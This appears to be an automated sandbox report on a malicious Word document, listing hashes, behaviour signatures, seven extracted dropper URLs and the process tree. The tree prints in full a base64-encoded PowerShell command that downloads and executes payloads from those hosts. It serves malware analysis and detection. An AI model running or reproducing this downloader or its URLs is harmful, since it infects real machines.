Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    21/05/2024, 21:12

General

  • Target

    64c8bcb7ed33a21196ae2f3344f5c778_JaffaCakes118.doc

  • Size

    215KB

  • MD5

    64c8bcb7ed33a21196ae2f3344f5c778

  • SHA1

    68b2cea3cf888af60d904a7c6899730639c65b4f

  • SHA256

    9e786d5fa88f060de3c17627c28c9a844f4e85036c0e90f0a4c5ac75e9b88fee

  • SHA512

    9c873c18edc13bd87be8f5bf577709e4e2012b616cf1df01927acba6ed6f89b4560ca40501a579014b9668d9fc08050f6e0815c0b9f7e5e147a1057070e6e079

  • SSDEEP

    1536:2B445TEgrO3jSWAg83tle1ZZ0293QM0eetR2cOupLB5UZ55+a923kLShGkVAelnP:222TWTogk079THcpOu5UZ5WhGMlnzD

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://dongyabingfu.com/wp-includes/w/

exe.dropper

http://givingthanksdaily.com/Q/

exe.dropper

http://uniteddatabase.net/wp-admin/dhJ/

exe.dropper

http://www.gozowindmill.com/meteo/nmy/

exe.dropper

http://kcdryervents.com/ca/D/

exe.dropper

http://www.greaudstudio.com/docs/kGQ/

exe.dropper

https://mrveggy.com/erros/3Ss/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\64c8bcb7ed33a21196ae2f3344f5c778_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1740
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1088
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -en JABYADMAZAB4AGIAaQBnAD0AKAAoACcARgAwACcAKwAnADIAJwApACsAKAAnAG8AMAAnACsAJwAyAGEAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFUAcwBFAHIAcABSAE8AZgBpAEwARQBcAE8ANAA0AHYAawA0AHcAXAB1AGwASgAyAEgAQgAxAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQAaQByAEUAYwB0AG8AUgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAARQBDAHUAUgBgAEkAYABUAHkAUABSAE8AdABvAGAAQwBvAGwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAnACkAKwAoACcAMQAnACsAJwAyACwAIAAnACkAKwAoACcAdAAnACsAJwBsAHMAMQAxACwAJwApACsAKAAnACAAdABsACcAKwAnAHMAJwApACkAOwAkAEsAaAB4AHgAZwBjAHMAIAA9ACAAKAAnAEkAJwArACgAJwB5ADQANAAnACsAJwBqACcAKQArACcANwAnACkAOwAkAFYAcQBxAHoAdgBhAHgAPQAoACcASgByACcAKwAoACcAdgAnACsAJwAxAHAAXwAnACkAKwAnADcAJwApADsAJABRAGMAbgByADcAawBuAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAE8AdQAnACsAKAAnAHcAJwArACcATwA0ADQAdgBrADQAJwApACsAJwB3ACcAKwAnAE8AdQAnACsAKAAnAHcAJwArACcAVQBsAGoAMgBoAGIAMQAnACsAJwBPACcAKwAnAHUAJwApACsAJwB3ACcAKQAgAC0AQwByAGUAcABsAGEAQwBFACAAKAAnAE8AJwArACcAdQB3ACcAKQAsAFsAYwBIAEEAcgBdADkAMgApACsAJABLAGgAeAB4AGcAYwBzACsAKAAnAC4AJwArACgAJwBlACcAKwAnAHgAZQAnACkAKQA7ACQASQB3AHkAbwBtAGMAaQA9ACgAJwBBAGsAJwArACcAZgAnACsAKAAnAHAAJwArACcAdABqADkAJwApACkAOwAkAEMAbgB3ADIAegBvAHoAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AdwBFAEIAQwBsAEkARQBuAFQAOwAkAEsAdgB1AGYAdwB2AG4APQAoACgAJwBoACcAKwAnAHQAdAAnACsAJwBwADoALwAvAGQAJwApACsAJwBvACcAKwAoACcAbgBnAHkAYQAnACsAJwBiACcAKQArACgAJwBpAG4AZwBmACcAKwAnAHUAJwApACsAKAAnAC4AYwBvAG0ALwB3ACcAKwAnAHAAJwArACcALQBpAG4AYwBsACcAKwAnAHUAJwApACsAJwBkACcAKwAoACcAZQBzAC8AJwArACcAdwAnACkAKwAoACcALwAqAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AZwAnACsAJwBpAHYAJwApACsAKAAnAGkAbgBnAHQAaAAnACsAJwBhACcAKQArACcAbgAnACsAKAAnAGsAJwArACcAcwBkAGEAaQBsAHkAJwArACcALgBjACcAKQArACcAbwBtACcAKwAoACcALwBRAC8AKgAnACsAJwBoACcAKQArACcAdAAnACsAKAAnAHQAcAA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAdQAnACsAJwBuAGkAJwApACsAKAAnAHQAZQBkACcAKwAnAGQAJwApACsAKAAnAGEAdAAnACsAJwBhACcAKQArACcAYgAnACsAKAAnAGEAcwAnACsAJwBlACcAKQArACgAJwAuACcAKwAnAG4AZQAnACkAKwAnAHQAJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAGQAJwApACsAKAAnAGgAJwArACcASgAvACoAJwApACsAJwBoAHQAJwArACgAJwB0AHAAJwArACcAOgAvAC8AdwAnACkAKwAnAHcAdwAnACsAKAAnAC4AZwAnACsAJwBvAHoAJwArACcAbwB3AGkAbgAnACkAKwAnAGQAJwArACgAJwBtACcAKwAnAGkAbAAnACkAKwAnAGwAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAbQAnACkAKwAnAGUAJwArACgAJwB0AGUAbwAnACsAJwAvAG4AJwApACsAKAAnAG0AeQAvACoAaAB0ACcAKwAnAHQAJwApACsAJwBwACcAKwAnADoALwAnACsAKAAnAC8AawBjACcAKwAnAGQAJwApACsAJwByAHkAJwArACcAZQByACcAKwAoACcAdgBlAG4AJwArACcAdAAnACkAKwAoACcAcwAnACsAJwAuAGMAbwBtAC8AYwBhACcAKQArACcALwAnACsAJwBEAC8AJwArACgAJwAqAGgAdAAnACsAJwB0ACcAKQArACgAJwBwACcAKwAnADoALwAvAHcAJwApACsAKAAnAHcAdwAnACsAJwAuACcAKQArACgAJwBnAHIAZQAnACsAJwBhAHUAZAAnACkAKwAnAHMAdAAnACsAJwB1ACcAKwAnAGQAJwArACgAJwBpAG8ALgAnACsAJwBjACcAKQArACcAbwBtACcAKwAoACcALwAnACsAJwBkAG8AYwAnACkAKwAnAHMALwAnACsAJwBrACcAKwAnAEcAUQAnACsAKAAnAC8AKgAnACsAJwBoAHQAJwApACsAKAAnAHQAJwArACcAcABzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAnAG0AJwArACgAJwByAHYAZQAnACsAJwBnACcAKwAnAGcAeQAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvAGUAcgByACcAKwAnAG8AJwArACcAcwAvADMAUwAnACkAKwAnAHMALwAnACkALgAiAFMAUABgAGwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQQBoAGoAZwB3AHQAdwA9ACgAKAAnAE8AJwArACcAdQBvADgAJwApACsAKAAnAG8AYQAnACsAJwB3ACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQARQA1AGoAbgB3AGIAcQAgAGkAbgAgACQASwB2AHUAZgB3AHYAbgApAHsAdAByAHkAewAkAEMAbgB3ADIAegBvAHoALgAiAEQAYABvAFcAbgBMAGAAbwBBAGAAZABGAGkATABFACIAKAAkAEUANQBqAG4AdwBiAHEALAAgACQAUQBjAG4AcgA3AGsAbgApADsAJABMAGUAcQBoAHcAcgBoAD0AKAAnAEYAcgAnACsAKAAnAHkAawAnACsAJwA2ACcAKQArACcAaAA2ACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGMAbgByADcAawBuACkALgAiAGwAYABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMgAyADEAMgAzACkAIAB7ACYAKAAnAEkAJwArACcAbgB2AG8AawBlACcAKwAnAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAFEAYwBuAHIANwBrAG4AKQA7ACQAVQB6AGgAMQB6ADAANQA9ACgAJwBOACcAKwAoACcANQA0ACcAKwAnAHoAbAB2AGEAJwApACkAOwBiAHIAZQBhAGsAOwAkAEEAMABwADQAMgBnAHUAPQAoACcATQAwACcAKwAoACcAZQAnACsAJwA2AG0AagBtACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABIAG4AdgBtAG8AcAAzAD0AKAAoACcAUQBoAGMAJwArACcAeQBwACcAKQArACcAZAAnACsAJwA5ACcAKQA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2644

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            3d321b96d09c72701ab4e16edb909bdb

            SHA1

            a32a730a8de3f149caacfebec31833b4ea967b9f

            SHA256

            a975a5007575b41fc2a759147865fb8ea822e42fbe8fef27cae23bc0147d9f7f

            SHA512

            ad507251ea46e5a6484b3d2c46b2f306fb6bf2d083aec9a5b9948ce01362d29feaa60c6b8426a5d7d128275b4346994c334efcd5d5fc5602fa7f77e9faecc236

          • memory/1740-33-0x00000000059D0000-0x0000000005AD0000-memory.dmp

            Filesize

            1024KB

          • memory/1740-47-0x000000007101D000-0x0000000071028000-memory.dmp

            Filesize

            44KB

          • memory/1740-7-0x00000000059D0000-0x0000000005AD0000-memory.dmp

            Filesize

            1024KB

          • memory/1740-13-0x00000000059D0000-0x0000000005AD0000-memory.dmp

            Filesize

            1024KB

          • memory/1740-22-0x00000000059D0000-0x0000000005AD0000-memory.dmp

            Filesize

            1024KB

          • memory/1740-27-0x00000000059D0000-0x0000000005AD0000-memory.dmp

            Filesize

            1024KB

          • memory/1740-32-0x00000000059D0000-0x0000000005AD0000-memory.dmp

            Filesize

            1024KB

          • memory/1740-0-0x000000002F521000-0x000000002F522000-memory.dmp

            Filesize

            4KB

          • memory/1740-2-0x000000007101D000-0x0000000071028000-memory.dmp

            Filesize

            44KB

          • memory/1740-73-0x000000007101D000-0x0000000071028000-memory.dmp

            Filesize

            44KB

          • memory/1740-72-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/1740-52-0x00000000059D0000-0x0000000005AD0000-memory.dmp

            Filesize

            1024KB

          • memory/1740-53-0x0000000005AD0000-0x0000000005BD0000-memory.dmp

            Filesize

            1024KB

          • memory/1740-55-0x00000000059D0000-0x0000000005AD0000-memory.dmp

            Filesize

            1024KB

          • memory/1740-56-0x00000000059D0000-0x0000000005AD0000-memory.dmp

            Filesize

            1024KB

          • memory/1740-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2644-40-0x0000000002420000-0x0000000002428000-memory.dmp

            Filesize

            32KB

          • memory/2644-39-0x000000001B250000-0x000000001B532000-memory.dmp

            Filesize

            2.9MB